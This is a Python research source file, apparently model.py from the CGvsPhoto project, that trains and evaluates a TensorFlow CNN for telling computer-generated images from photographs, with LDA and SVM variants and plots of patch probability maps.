W_fc3 = weight_variable([1024, nb_class],
nb_input = 1024)
with tf.name_scope('Bias'):
b_fc3 = bias_variable([nb_class])
y_conv = tf.matmul(h_fc1_drop, W_fc3) + b_fc3
self.y_conv = y_conv
# support for the learning label
y_ = tf.placeholder(tf.float32, [None, nb_class])
self.y_ = y_
# Define loss (cost) function and optimizer
print(' setup loss function and optimizer ...')
# softmax to have normalized class probabilities + cross-entropy
with tf.name_scope('cross_entropy'):
softmax_cross_entropy = tf.nn.softmax_cross_entropy_with_logits(labels = y_, logits = y_conv)
with tf.name_scope('total'):
cross_entropy_mean = tf.reduce_mean(softmax_cross_entropy)
tf.summary.scalar('cross_entropy', cross_entropy_mean)
with tf.name_scope('train'):
train_step = tf.train.AdamOptimizer(1e-4).minimize(cross_entropy_mean)
# with tf.name_scope('enforce_constraints'):
if self.remove_context:
# self.zero_op = tf.assign(ref = self.W_convs[0][1,1,0,:], value = tf.zeros([nf[0]]))
center = int(self.remove_filter_size/2)
self.zero_op = tf.scatter_nd_update(ref = self.W_convs[0], indices = tf.constant([[center,center,0,i] for i in range(nf[0])]), updates = tf.zeros(nf[0]))
self.norm_op = tf.assign(ref = self.W_convs[0], value = tf.divide(self.W_convs[0],tf.reduce_sum(self.W_convs[0], axis = 3, keep_dims = True)))
self.minus_one_op = tf.scatter_nd_update(ref = self.W_convs[0], indices = tf.constant([[center,center,0,i] for i in range(nf[0])]), updates = tf.constant([-1.0 for i in range(nf[0])]))
self.norm = tf.reduce_sum(self.W_convs[0], axis = 3, keep_dims = True)
self.train_step = train_step
print(' test ...')
# 'correct_prediction' is a function. argmax(y, 1), here 1 is for the axis number 1
correct_prediction = tf.equal(tf.argmax(y_conv,1), tf.argmax(y_,1))
# 'accuracy' is a function: cast the boolean prediction to float and average them
with tf.name_scope('accuracy'):
accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
tf.summary.scalar('accuracy', accuracy)
self.accuracy = accuracy
self.graph = graph
print(' model created.')
def validation_testing(self, it, nb_iterations = 20, batch_size = 50,
plot_histograms = False, range_hist = [0.,1.],
selected_hist_nb = 8, run_name = '',
show_filters = True):
"""Computes validation accuracy during training and plots some visualization.
Returns the accuracy on the validation data. Can also plot some histograms of the filtered images
(if the Hist layer is selected) and the first layer's filters.
:param it: The number of the iteration in the training process
:param nb_iterations: The number of batches to process on the validation set
:param batch_size: Batch size when loading the validation images
:param plot_hitograms: Whether to plot the histograms or not
:param range_hist: The value range for plotting the histograms
:param selected_hist_nb: The number of histograms to plot
:param run_name: The name of the training run
:param show_filters: Whether to show the first layer's filters
:type it: int
:type nb_iterations: int
:type batch_size: int
:type plot_hitograms: bool
:type range_hist: table
:type selected_hist_nb: int
:type run_name: str
:type show_filters: bool
"""
if show_filters:
nb_height = 4
nb_width = int(self.nf[0]/nb_height)
img, axes = plt.subplots(nrows = nb_width, ncols = nb_height)
gs1 = gridspec.GridSpec(nb_height, nb_width)
for i in range(self.nf[0]):
ax1 = plt.subplot(gs1[i])
ax1.axis('off')
im = plt.imshow(self.W_conv1[:,:,0,i].eval(), cmap = 'jet', vmin = -5, vmax = 5)
ax1.set_xticklabels([])
ax1.set_yticklabels([])
ax1.autoscale(False)
ax1.set_adjustable('box-forced')
# axes.get_yaxis().set_ticks([])
# plt.ylabel('Kernel ' + str(i), fontsize = 5.0)
# ax1.set_ylabel('Kernel ' + str(i), fontsize = 5.0)
ax1.set_title("Filter " + str(i + 1), fontsize = 12.0)
img.subplots_adjust(wspace = 0.1, hspace = 0.6, right = 0.7)
cbar_ax = img.add_axes([0.75, 0.15, 0.03, 0.7])
cbar = img.colorbar(im, ticks=[-5, 0, 5], cax=cbar_ax)
cbar.ax.set_yticklabels(['< -5', '0', '> 5'])
plt.show(img)
plt.close()
if plot_histograms and self.feature_extractor != 'Hist':
print("Can't plot the histograms, feature extractor is 'Stats'...")
validation_batch_size = batch_size
validation_accuracy = 0
# validation_auc = 0
self.data.validation_iterator = 0
if plot_histograms:
nb_CGG = 0
hist_CGG = [np.zeros((self.nbins+1,)) for i in range(selected_hist_nb)]
nb_real = 0
hist_real = [np.zeros((self.nbins+1,)) for i in range(selected_hist_nb)]
for _ in range( nb_iterations ) :
batch_validation = self.data.get_batch_validation(batch_size=validation_batch_size,
crop = False,
random_flip_flop = True,
random_rotate = True)
feed_dict = {self.x: batch_validation[0],
self.y_: batch_validation[1],
self.keep_prob: 1.0}
validation_accuracy += self.accuracy.eval(feed_dict)
if plot_histograms and self.feature_extractor == 'Hist':
# Computing the mean histogram for each class
hist_plot = self.hist.eval(feed_dict)
for k in range(validation_batch_size):
if batch_validation[1][k][0] == 1.:
nb_real +=1
is_real = True
else:
nb_CGG += 1
is_real = False
for j in range(selected_hist_nb):
for l in range(self.nbins+1):
if is_real:
hist_real[j][l] += hist_plot[k,j,l]
else:
hist_CGG[j][l] += hist_plot[k,j,l]
for p in range(selected_hist_nb):
hist_CGG[p] /= nb_CGG
hist_real[p] /= nb_real
if plot_histograms and self.feature_extractor == 'Hist':
# Plotting mean histogram for CGG
fig = plt.figure(1)
for k in range(selected_hist_nb):
plt.subplot(selected_hist_nb/2, 2, k+1)
plt.bar(np.linspace(range_hist[0], range_hist[1], self.nbins+1),
hist_CGG[k], width = 1/(self.nbins + 1))
plt.plot(np.linspace(range_hist[0], range_hist[1], self.nbins+1),
hist_CGG[k], 'r')
fig.suptitle("Mean histogram for CGG", fontsize=14)
plt.show()
plt.close()
# Plotting mean histogram for Real
fig = plt.figure(2)
for k in range(selected_hist_nb):
plt.subplot(selected_hist_nb/2, 2, k+1)
plt.bar(np.linspace(range_hist[0], range_hist[1], self.nbins+1),
hist_real[k], width = 1/(self.nbins + 1))
plt.plot(np.linspace(range_hist[0], range_hist[1],self.nbins+1),
hist_real[k], 'r')
fig.suptitle("Mean histogram for Real", fontsize=14)
plt.show()
plt.close()
validation_accuracy /= nb_iterations
print(" step %d, training accuracy %g (%d validations tests)"%(it, validation_accuracy, validation_batch_size*nb_iterations))
return(validation_accuracy)
def train(self, nb_train_batch, nb_test_batch,
nb_validation_batch, validation_frequency = 10, show_filters = False):
"""Trains the model on the selected database training set.
Trains a blank single-image classifer (or initialized with some pre-trained weights).
The weights are saved in the corresponding file along training, validation is computed,
showed and saved at the end. Finnaly, summaries are generated.
Testing is also performed for single-images.
:param nb_train_batch: The number of batches to train (can be on multiple epochs)
:param nb_test_batch: The number of batches to test
:param nb_validation_batch: The number of batch for validation
:param validation_frequency: Performs validation testing every validation_frequency batches
:param show_filters: Whether to show the first layer's filters at each validation step
:type nb_train_batch: int
:type nb_test_batch: int
:type nb_validation_batch: int
:type validation_frequency: int
:type show_filters: bool
"""
run_name = input(" Choose a name for the run : ")
path_save = self.dir_ckpt + run_name
acc_name = self.dir_summaries + run_name + "/validation_accuracy_" + run_name + ".csv"
# computation time tick
start_clock = time.clock()
start_time = time.time()
batch_clock = None
# start a session
print(' start session ...')
with tf.Session(graph=self.graph, config=tf.ConfigProto(log_device_placement=self.using_GPU)) as sess:
merged = tf.summary.merge_all()
if not os.path.exists(self.dir_summaries + run_name):
os.mkdir(self.dir_summaries + run_name)
train_writer = tf.summary.FileWriter(self.dir_summaries + run_name,
sess.graph)
tf.global_variables_initializer().run()
tf.local_variables_initializer().run()
saver = tf.train.Saver()
print(' variable initialization ...')
restore_weigths = input("\nRestore weight from previous session ? (y/N) : ")
if restore_weigths == 'y':
file_to_restore = input("\nName of the file to restore (Directory : " +
self.dir_ckpt + ') : ')
saver.restore(sess, self.dir_ckpt + file_to_restore)
print('\n Model restored\n')
# Train
print(' train ...')
start_clock = time.clock()
start_time = time.time()
validation_accuracy = []
for i in range(nb_train_batch):
# enforce constraints on first layer :
if self.remove_context:
sess.run(self.zero_op)
sess.run(self.norm_op)
sess.run(self.minus_one_op)
print(self.W_conv1.eval()[:,:,0,0])
# print(self.W_conv1.eval()[:,:,0,0])
# evry validation_frequency batches, test the accuracy
if i%validation_frequency == 0 :
if i%100 == 0:
plot_histograms = False
else:
plot_histograms = False
v = self.validation_testing(i, nb_iterations = nb_validation_batch,
batch_size = self.batch_size,
plot_histograms = plot_histograms,
run_name = run_name,
show_filters = show_filters)
validation_accuracy.append(v)
# regular training
batch = self.data.get_next_train_batch(self.batch_size, False, True, True)
feed_dict = {self.x: batch[0], self.y_: batch[1], self.keep_prob: 0.65}
summary, _ = sess.run([merged, self.train_step], feed_dict = feed_dict)
train_writer.add_summary(summary, i)
# Saving weights every 100 batches
if i%100 == 0:
path_save_batch = path_save + str(i) + ".ckpt"
print(' saving weights in file : ' + path_save_batch)
saver.save(sess, path_save_batch)
print(' OK')
if batch_clock is not None:
time_elapsed = (time.time()-batch_clock)
print(' Time last 100 batchs : ', time.strftime("%H:%M:%S",time.gmtime(time_elapsed)))
remaining_time = time_elapsed * int((nb_train_batch - i)/100)
print(' Remaining time : ', time.strftime("%H:%M:%S",time.gmtime(remaining_time)))
batch_clock = time.time()
print(' saving validation accuracy...')
file = open(acc_name, 'w', newline='')
try:
writer = csv.writer(file)
for v in validation_accuracy:
writer.writerow([str(v)])
finally:
file.close()
print(' done.')
# final test
print(' final test ...')
test_accuracy = 0
# test_auc = 0
nb_iterations = nb_test_batch
self.data.test_iterator = 0
scores = np.zeros([nb_test_batch*self.batch_size,])
y_test = np.zeros([nb_test_batch*self.batch_size,])
for k in range( nb_iterations ) :
batch_test = self.data.get_batch_test(self.batch_size, False, True, True)
feed_dict = {self.x:batch_test[0], self.y_: batch_test[1], self.keep_prob: 1.0}
test_accuracy += self.accuracy.eval(feed_dict)
# print(scores[k*self.batch_size:(k+1)*self.batch_size].shape)
scores[k*self.batch_size:(k+1)*self.batch_size] = normalize(self.y_conv.eval(feed_dict))[:,1]
y_test[k*self.batch_size:(k+1)*self.batch_size] = batch_test[1][:,1]
# test_auc += sess.run(auc, feed_dict)[0]
test_accuracy /= nb_iterations
print(" test accuracy %g"%test_accuracy)
fpr, tpr, _ = roc_curve(y_test, scores)
filename = '/home/smg/v-nicolas/ROC/' + run_name + '.pkl'
print('Saving tpr and fpr in file : ' + filename)
pickle.dump((fpr, tpr), open(filename, 'wb'))
# test_auc /= (nb_iterations - 1)
# print(" test AUC %g"%test_auc)
if nb_train_batch > validation_frequency:
plt.figure()
plt.plot(np.linspace(0,nb_train_batch,int(nb_train_batch/10)), validation_accuracy)
plt.title("Validation accuracy during training")
plt.xlabel("Training batch")
plt.ylabel("Validation accuracy")
plt.show()
plt.close()
# done
print(" computation time (cpu) :",time.strftime("%H:%M:%S", time.gmtime(time.clock()-start_clock)))
print(" computation time (real):",time.strftime("%H:%M:%S", time.gmtime(time.time()-start_time)))
print(' done.')
def show_histogram(self):
"""Plots histograms of the last layer outputs for some images"""
with tf.Session(graph=self.graph) as sess:
tf.global_variables_initializer().run()
tf.local_variables_initializer().run()
saver = tf.train.Saver()
print(' variable initialization ...')
file_to_restore = input("\nName of the file to restore (Directory : " +
self.dir_ckpt + ') : ')
saver.restore(sess, self.dir_ckpt + file_to_restore)
print('\n Model restored\n')
batch = self.data.get_next_train_batch(self.batch_size, False, True, True)
feed_dict = {self.x: batch[0], self.y_: batch[1], self.keep_prob: 1.0}
conv = self.h_conv2.eval(feed_dict = feed_dict)
for i in range(self.batch_size):
plt.figure()
plt.hist(np.reshape(conv[i,:,:,0], (self.image_size*self.image_size,)))
plt.show()
def mean_histogram(self, nb_images = 5000):
print(" Showing the histograms of filtered images...")
with tf.Session(graph=self.graph) as sess:
tf.global_variables_initializer().run()
tf.local_variables_initializer().run()
saver = tf.train.Saver()
print(' variable initialization ...')
file_to_restore = input("\nName of the file to restore (Directory : " +
self.dir_ckpt + ') : ')
saver.restore(sess, self.dir_ckpt + file_to_restore)
print('\n Model restored\n')
j = 0
nreal = 0
ncgg = 0
while j < nb_images:
batch = self.data.get_next_train_batch(self.batch_size, False, True, True)
feed_dict = {self.x: batch[0], self.y_: batch[1], self.keep_prob: 1.0}
conv = self.h_conv1.eval(feed_dict = feed_dict)
nbins = 150
hist_values_CGG = np.zeros((nbins,))
hist_values_Real = np.zeros((nbins,))
for i in range(self.batch_size):
if batch[1][i][0] == 1:
# print(conv[i,:,:,15])
hist_values_Real += np.histogram(conv[i,:,:,1], bins = nbins, range = (0., 1.))[0]
nreal += 1
else:
# print(conv[i,:,:,15])
hist_values_CGG += np.histogram(conv[i,:,:,1], bins = nbins, range = (0., 1.))[0]
ncgg += 1
j+= self.batch_size
hist_values_CGG /= ncgg
hist_values_Real /= nreal
plt.figure()
plt.plot(np.linspace(0,1, nbins), hist_values_Real, color = 'b',
label = 'Real')
plt.plot(np.linspace(0,1, nbins), hist_values_CGG, color = 'r',
label = 'CGG')
plt.legend()
plt.show()
def lda_training(self, nb_train_batch, nb_test_batch):
"""Trains a LDA classifier on top of the feature extractor.
Restores the weights of the feature extractor and trains a new LDA classifier. The trained LDA can then be reused.
Finally tests the pipeline on the test dataset.
:param nb_train_batch: The number of batches to train (can be on multiple epochs)
:param nb_test_batch: The number of batches to test
:type nb_train_batch: int
:type nb_test_batch: int
"""
self.lda_classifier = LinearDiscriminantAnalysis()
# start a session
print(' start session ...')
with tf.Session(graph=self.graph) as sess:
saver = tf.train.Saver()
print(' variable initialization ...')
tf.global_variables_initializer().run()
tf.local_variables_initializer().run()
file_to_restore = input("\nName of the file to restore (Directory : " +
self.dir_ckpt + ') : ')
saver.restore(sess, self.dir_ckpt + file_to_restore)
# training the LDA classifier
features = []
labels = []
for i in range(nb_train_batch):
if (i%10 == 0):
print("Computing features for training batch " + str(i) + '/' + str(nb_train_batch))
batch = self.data.get_next_train_batch(self.batch_size, False, True, True)
feed_dict = {self.x: batch[0], self.y_: batch[1], self.keep_prob: 1.0}
h = self.flatten.eval(feed_dict = feed_dict)
features.append(h)
labels.append(np.argmax(np.array(batch[1]), 1))
features = np.reshape(np.array(features), (self.batch_size*nb_train_batch, features[0].shape[1]))
labels = np.reshape(np.array(labels), (self.batch_size*nb_train_batch,))
print(features.shape)
print(labels.shape)
self.lda_classifier.fit(features, labels)
print(' Testing ...')
# test_auc = 0
features_test = []
labels_test = []
for _ in range(nb_test_batch) :
batch_test = self.data.get_batch_test(self.batch_size, False, True, True)
feed_dict = {self.x:batch_test[0], self.y_: batch_test[1], self.keep_prob: 1.0}
h = self.flatten.eval(feed_dict = feed_dict)
features_test.append(h)
labels_test.append(np.argmax(np.array(batch_test[1]), 1))
features_test = np.reshape(np.array(features_test), (self.batch_size*nb_test_batch, features_test[0].shape[1]))
labels_test = np.reshape(np.array(labels_test), (self.batch_size*nb_test_batch,))
labels_pred = self.lda_classifier.predict(features_test)
test_accuracy = acc(labels_pred, labels_test)
print(" test accuracy %g"%test_accuracy)
self.clf = self.lda_classifier
def svm_training(self, nb_train_batch, nb_test_batch):
"""Trains a SVM classifier (RBF kernel) on top of the feature extractor.
Restores the weights of the feature extractor and trains a new SVM classifier with RBF kernel. The trained SVM can then be reused.
Finally tests the pipeline on the test dataset.
:param nb_train_batch: The number of batches to train (can be on multiple epochs)
:param nb_test_batch: The number of batches to test
:type nb_train_batch: int
:type nb_test_batch: int
"""
self.svm_classifier = SVC(probability = True)
# start a session
print(' start session ...')
with tf.Session(graph=self.graph) as sess:
saver = tf.train.Saver()
print(' variable initialization ...')
tf.global_variables_initializer().run()
tf.local_variables_initializer().run()
file_to_restore = input("\nName of the file to restore (Directory : " +
self.dir_ckpt + ') : ')
saver.restore(sess, self.dir_ckpt + file_to_restore)
# training the LDA classifier
features = []
labels = []
for i in range(nb_train_batch):
if (i%10 == 0):
print("Computing features for training batch " + str(i) + '/' + str(nb_train_batch))
batch = self.data.get_next_train_batch(self.batch_size, False, True, True)
feed_dict = {self.x: batch[0], self.y_: batch[1], self.keep_prob: 1.0}
h = self.flatten.eval(feed_dict = feed_dict)
features.append(h)
labels.append(np.argmax(np.array(batch[1]), 1))
features = np.reshape(np.array(features), (self.batch_size*nb_train_batch, features[0].shape[1]))
labels = np.reshape(np.array(labels), (self.batch_size*nb_train_batch,))
print(features.shape)
print(labels.shape)
self.svm_classifier.fit(features, labels)
print(' Testing ...')
# test_auc = 0
features_test = []
labels_test = []
for _ in range(nb_test_batch) :
batch_test = self.data.get_batch_test(self.batch_size, False, True, True)
feed_dict = {self.x:batch_test[0], self.y_: batch_test[1], self.keep_prob: 1.0}
h = self.flatten.eval(feed_dict = feed_dict)
features_test.append(h)
labels_test.append(np.argmax(np.array(batch_test[1]), 1))
features_test = np.reshape(np.array(features_test), (self.batch_size*nb_test_batch, features_test[0].shape[1]))
labels_test = np.reshape(np.array(labels_test), (self.batch_size*nb_test_batch,))
labels_pred = self.svm_classifier.predict(features_test)
test_accuracy = acc(labels_pred, labels_test)
print(" test accuracy %g"%test_accuracy)
self.clf = self.svm_classifier
def test_total_images(self, test_data_path, nb_images,
minibatch_size = 25, decision_rule = 'majority_vote',
show_images = False,
save_images = False,
only_green = True, other_clf = False):
"""Performs boosting for classifying full-size images.
Decomposes each image into patches (with size = self.image_size), computes the posterior probability of each class
and uses a decision rule to classify the full-size image.
Optionnaly plots or save the probability map and the original image in the visualization directory.
:param test_data_path: The absolute path to the test dataset. Must contain two directories : CGG/ and Real/
:param nb_images: The number of images to test
:param minibatch_size: The size of the batch to process the patches
:param decision_rule: The decision rule to use to aggregate patches prediction
:param show_images: Whether to show images or not
:param save_images: Whether to save images or not
:param only_green: Whether to take only the green channel of the image
:param other_clf: Whether to use aother classifier (LDA or SVM). If True, takes the lastly trained
:type test_data_path: str
:type nb_images: int
:type minibatch_size: int
:type decision_rule: str
:type show_images: bool
:type save_images: bool
:type only_green: bool
:type other_clf:bool
"""
valid_decision_rule = ['majority_vote', 'weighted_vote']
if decision_rule not in valid_decision_rule:
raise NameError(decision_rule + ' is not a valid decision rule.')
test_name = input(" Choose a name for the test : ")
if(save_images):
if not os.path.exists(self.dir_visualization + test_name):
os.mkdir(self.dir_visualization + test_name)
if not only_green:
print(' No visualization when testing all channels...')
show_images = False
save_images = False
print(' Testing for the database : ' + test_data_path)
print(' start session ...')
with tf.Session(graph=self.graph) as sess:
saver = tf.train.Saver()
print(' variable initialization ...')
tf.global_variables_initializer().run()
tf.local_variables_initializer().run()
file_to_restore = input("\nName of the file to restore (Directory : " +
self.dir_ckpt + ') : ')
saver.restore(sess, self.dir_ckpt + file_to_restore)
data_test = il.Test_loader(test_data_path, subimage_size = self.image_size, only_green = only_green)
y = []
scores = []
tp = 0
fp = 0
nb_CGG = 0
accuracy = 0
for i in range(nb_images):
batch, label, width, height, original, image_file = data_test.get_next_image()
batch_size = batch.shape[0]
j = 0
prediction = 0
labels = []
diff = []
nb_im = 0
while j < batch_size:
if other_clf:
feed_dict = {self.x: batch[j:j+minibatch_size], self.keep_prob: 1.0}
features = self.flatten.eval(feed_dict = feed_dict)
pred = np.log(self.clf.predict_proba(features) + 0.00001)
else:
feed_dict = {self.x: batch[j:j+minibatch_size], self.keep_prob: 1.0}
pred = self.y_conv.eval(feed_dict)
nb_im += pred.shape[0]
label_image = np.argmax(pred, 1)
d = np.max(pred, 1) - np.min(pred, 1)
for k in range(d.shape[0]):
diff.append(np.round(d[k], 1))
if decision_rule == 'majority_vote':
prediction += np.sum(label_image)
if decision_rule == 'weighted_vote':
prediction += np.sum(2*d*(label_image - 0.5))
for l in label_image:
labels.append(data_test.image_class[l])
j+=minibatch_size
if(label == 'Real'):
y.append(0)
else:
y.append(1)
# print(prediction/nb_im)
scores.append(prediction/nb_im)
diff = np.array(diff)
if decision_rule == 'majority_vote':
prediction = data_test.image_class[int(np.round(prediction/batch_size))]
if decision_rule == 'weighted_vote':
prediction = data_test.image_class[int(max(prediction,0)/abs(prediction))]
if label == 'CGG':
nb_CGG += 1
if(label == prediction):
accuracy+= 1
if(prediction == 'CGG'):
tp += 1
else:
if prediction == 'CGG':
fp += 1
print(prediction, label)
if show_images and not save_images:
test_name = ''
if save_images or show_images:
self.image_visualization(path_save = self.dir_visualization + test_name,
file_name = str(i),
images = batch, labels_pred = labels,
true_label = label, width = width,
height = height, diff = diff,
original = original,
show_images = show_images,
save_images = save_images,
save_original = save_images,
prob_map = save_images)
if ((i+1)%10 == 0):
print('\n_______________________________________________________')
print(str(i+1) + '/' + str(nb_images) + ' images treated.')
print('Accuracy : ' + str(round(100*accuracy/(i+1), 2)) + '%')
if tp + fp != 0:
print('Precision : ' + str(round(100*tp/(tp + fp), 2)) + '%')
if nb_CGG != 0:
print('Recall : ' + str(round(100*tp/nb_CGG,2)) + '%')
print('_______________________________________________________\n')
print(np.array(y))
fpr, tpr, thresholds = roc_curve(np.array(y), 0.5 + np.array(scores)/10)
print(0.5 + np.array(scores)/np.max(np.array(scores)))
print(thresholds)
filename = '/home/smg/v-nicolas/ROC/' + test_name + '.pkl'
print('Saving tpr and fpr in file : ' + filename)
pickle.dump((fpr,tpr), open(filename, 'wb'))
print('\n_______________________________________________________')
print('Final Accuracy : ' + str(round(100*accuracy/(nb_images), 3)) + '%')
print('Final Precision : ' + str(round(100*tp/(tp + fp), 3)) + '%')
print('Final Recall : ' + str(round(100*tp/nb_CGG, 3)) + '%')
print('Final AUC : ' + str(round(100*auc(fpr, tpr), 3)) + '%')
print('_______________________________________________________\n')
def image_visualization(self, path_save, file_name, images, labels_pred,
true_label, width, height, diff, original = None,
show_images = False, save_images = False,
prob_map = False, save_original = False):
"""Computes image visualization and save/show it
Permits to visualize the probability map of the image. Green color represents correctly classified patches
and red wrongly classified ones. The intensity depends on the level of certainty.
:param path_save: The absolute path where images should be saved
:param file_name: The name of input image file
:param images: An array containing patches extracted from the full-size image
:param width: The width of the full-size image
:param height: The height of the full-size image
:param diff: Differences between log posterior probabilities for each patch
:param original: The original image
:param show_images: Whether to show images or not
:param save_images: Whether to save images or not
:param prob_map: Whether to save the probability map
:param save_original: Whether to save the original image
:type path_save: str
:type file_name: str
:type images: numpy array
:type width: int
:type height: int
:type diff: numpy array
:type original: numpy array
:type show_images: bool
:type save_images: bool
:type prob_map: bool
:type save_original: bool
"""
nb_width = int(width/self.image_size)
nb_height = int(height/self.image_size)
m = 10
img = plt.figure(figsize = (nb_width, nb_height))
gs1 = gridspec.GridSpec(nb_height, nb_width)
for i in range(len(images)):
cdict_green = {'red': ((0.0,0.0,0.0),
(1.0,1.0 - diff[i]/m,1.0 - diff[i]/m)),
'blue': ((0.0,0.0,0.0),
(1.0,1.0 - diff[i]/m,1.0 - diff[i]/m)),
'green': ((0.0,0.0,0.0),
(1.0,1.0,1.0))}
cdict_red = {'red': ((0.0,0.0,0.0),
(1.0,1.0,1.0)),
'blue': ((0.0,0.0,0.0),
(1.0,1.0 - diff[i]/m,1.0 - diff[i]/m)),
'green': ((0.0,0.0,0.0),
(1.0,1.0 - diff[i]/m,1.0 - diff[i]/m))}
ax1 = plt.subplot(gs1[i])
ax1.axis('off')
if labels_pred[i] == 'Real':
if diff[i] > 0.4:
cmap = mcolors.LinearSegmentedColormap('my_green', cdict_green, 100)
else:
cmap = 'gray'
else:
if diff[i] > 0.4:
cmap = mcolors.LinearSegmentedColormap('my_red', cdict_red, 100)
else:
cmap = 'gray'
images[i,0,0,0] = 0
images[i,0,1,0] = 1
plt.imshow(images[i,:,:,0], cmap = cmap)
ax1.set_xticklabels([])
ax1.set_yticklabels([])
# ax1.text(40, 50, str(diff[i]))
gs1.update(wspace=.0, hspace=.0)
if show_images:
plt.show(img)
if save_images:
plt.savefig(path_save + '/vis_' + file_name + '.png',
bbox_inches='tight',
pad_inches=0.0)
plt.close()
if save_images:
if save_original:
plt.figure()
plt.axis('off')
plt.imshow(original, cmap = 'gray')
plt.savefig(path_save + '/vis_' + file_name + '_original' + '.png',
bbox_inches='tight',
pad_inches=0.0)
if prob_map:
img = plt.figure(figsize = (nb_width, nb_height))
gs1 = gridspec.GridSpec(nb_height, nb_width)
for i in range(len(images)):
map_im = np.ones((self.image_size, self.image_size))
map_im[0,0] = 0
cdict_green = {'red': ((0.0,0.0,0.0),
(1.0,1.0 - diff[i]/m,1.0 - diff[i]/m)),
'blue': ((0.0,0.0,0.0),
(1.0,1.0 - diff[i]/m,1.0 - diff[i]/m)),
'green': ((0.0,0.0,0.0),
(1.0,1.0,1.0))}
cdict_red = {'red': ((0.0,0.0,0.0),
(1.0,1.0,1.0)),
'blue': ((0.0,0.0,0.0),
(1.0,1.0 - diff[i]/m,1.0 - diff[i]/m)),
'green': ((0.0,0.0,0.0),
(1.0,1.0 - diff[i]/m,1.0 - diff[i]/m))}
ax1 = plt.subplot(gs1[i])
ax1.axis('off')
if labels_pred[i] == true_label:
if diff[i] > 0.4:
cmap = mcolors.LinearSegmentedColormap('my_green', cdict_green, 100)
else:
cmap = 'gray'
map_im = map_im*0.7
else:
if diff[i] > 0.4:
cmap = mcolors.LinearSegmentedColormap('my_red', cdict_red, 100)
else:
cmap = 'gray'
map_im = map_im*0.7
plt.imshow(map_im, cmap = cmap)
ax1.set_xticklabels([])
ax1.set_yticklabels([])
gs1.update(wspace=.0, hspace=.0)
if show_images:
plt.show(img)
if save_images:
plt.savefig(path_save + '/vis_' + file_name + '_probmap' + '.png',
bbox_inches='tight',
pad_inches=0.0)
plt.close()
del(img)
def show_filtered(self, image_file):
print(' Loading image from file : ' + image_file)
im = Image.open(image_file)
im = np.reshape(np.array([np.asarray(im)]), (1,self.image_size, self.image_size, 1))
print(' start session ...')
with tf.Session(graph=self.graph) as sess:
saver = tf.train.Saver()
print(' variable initialization ...')
tf.global_variables_initializer().run()
tf.local_variables_initializer().run()
file_to_restore = input("\nName of the file to restore (Directory : " +
self.dir_ckpt + ') : ')
saver.restore(sess, self.dir_ckpt + file_to_restore)
feed_dict = {self.x: im, self.keep_prob: 1.0}
filtered = self.h_conv1.eval(feed_dict = feed_dict)
for i in range(filtered.shape[3]):
plt.figure()
plt.imshow(filtered[0,:,:,i], cmap = 'gray')
plt.show()
def test_splicing(self, data_path, nb_images, save_images = True, show_images = False,
minibatch_size = 25):
"""Computes image visualization for spliced images
Decomposes each image into patches (with size = self.image_size), computes the posterior probability of each class
and show the probability map.
:param data_path: Path to the spliced images. Should contain two directories : CGG/ and Real/
:param nb_images: Number of spliced images to process
:param show_images: Whether to show images or not
:param save_images: Whether to save images or not
:param minibatch_size: The size of the batch to process the patches
:type data_path: str
:type nb_images: int
:type show_images: bool
:type save_images: bool
:type minibatch_size: int
"""
if(save_images):
test_name = input(" Choose a name for the test : ")
path_save = self.dir_visualization + test_name
if not os.path.exists(self.dir_visualization + test_name):
os.mkdir(self.dir_visualization + test_name)
else:
path_save = ''
print(' start session ...')
with tf.Session(graph=self.graph) as sess:
saver = tf.train.Saver()
print(' variable initialization ...')
tf.global_variables_initializer().run()
tf.local_variables_initializer().run()
file_to_restore = input("\nName of the file to restore (Directory : " +
self.dir_ckpt + ') : ')
saver.restore(sess, self.dir_ckpt + file_to_restore)
data_test = il.Test_loader(data_path,
subimage_size = self.image_size, only_green = self.only_green)
for i in range(nb_images):
batch, label, width, height, original, file_name = data_test.get_next_image()
batch_size = batch.shape[0]
j = 0
labels = []
diff = []
while j < batch_size:
feed_dict = {self.x: batch[j:j+minibatch_size], self.keep_prob: 1.0}
pred = self.y_conv.eval(feed_dict)
label_image = np.argmax(pred, 1)
d = np.max(pred, 1) - np.min(pred, 1)
for k in range(d.shape[0]):
diff.append(np.round(d[k], 1))
for l in label_image:
labels.append(data_test.image_class[l])
j+=minibatch_size
diff = np.array(diff)
self.image_visualization(path_save = path_save,
file_name = str(i),
images = batch, labels_pred = labels,
true_label = label, width = width,
height = height, diff = diff,
original = original,
show_images = show_images,
save_images = save_images,
prob_map = save_images,
save_original= save_images)
if __name__ == '__main__':
using_GPU = False
if config == 'server':
database_path = '/work/smg/v-nicolas/level-design_raise_100/'
else:
database_path = '/home/nicolas/Database/level-design_raise_100/'
image_size = 100
nb_train_batch = 5000
nb_test_batch = 80
nb_validation_batch = 40
clf = Model(database_path, image_size, nbins = 11,
batch_size = 50, histograms = False, stats = True,
using_GPU = using_GPU)
# clf.mean_histogram()
# clf.show_filtered('/home/nicolas/Database/level-design_dresden_100/train/CGG/train153.jpg')
clf.train(nb_train_batch = nb_train_batch,
nb_test_batch = nb_test_batch,
nb_validation_batch = nb_validation_batch,
show_filters = False)
# clf.svm_training(nb_train_batch = 800, nb_test_batch = 80)
if config == 'server':
test_data_path = '/work/smg/v-nicolas/level-design_raise_650/test/'
else:
test_data_path = '/home/nicolas/Database/level-design_raise_650/test/'
clf.test_total_images(test_data_path = test_data_path,
nb_images = 720, decision_rule = 'weighted_vote',
show_images = False,
save_images = False,
only_green = True,
other_clf = False)
if config == 'server':
test_data_path = '/work/smg/v-nicolas/level-design_raise/test/'
else:
test_data_path = '/home/nicolas/Database/level-design_raise/test/'
clf.test_total_images(test_data_path = test_data_path,
nb_images = 720, decision_rule = 'weighted_vote',
show_images = False,
save_images = False,
only_green = True,
other_clf = False)
if config == 'server':
splicing_data_path = '/work/smg/v-nicolas/splicing/'
else:
splicing_data_path = '/home/nicolas/Database/splicing/'
clf.test_splicing(data_path = splicing_data_path,
nb_images = 50,
minibatch_size = 25,
show_images = False,
save_images = True)
|
NicoRahm/CGvsPhoto
|
CGvsPhoto/model.py
|
Python
|
mit
| 57,552
|
[
"Gaussian"
] |
5b36eeb2f1d560d32900c7533d1257625f20971760c2c8cda10fdbfbe1d2ac66
|
import mayavi
import vtk
import pyvtk
import numpy as N
try:
from vtk.util import vtkConstants
except ImportError:
class vtkConstants:
pass
vtkConstants.VTK_CHAR=2
vtkConstants.VTK_UNSIGNED_CHAR = 3
vtkConstants.VTK_SHORT = 4
vtkConstants.VTK_UNSIGNED_SHORT = 5
vtkConstants.VTK_INT = 6
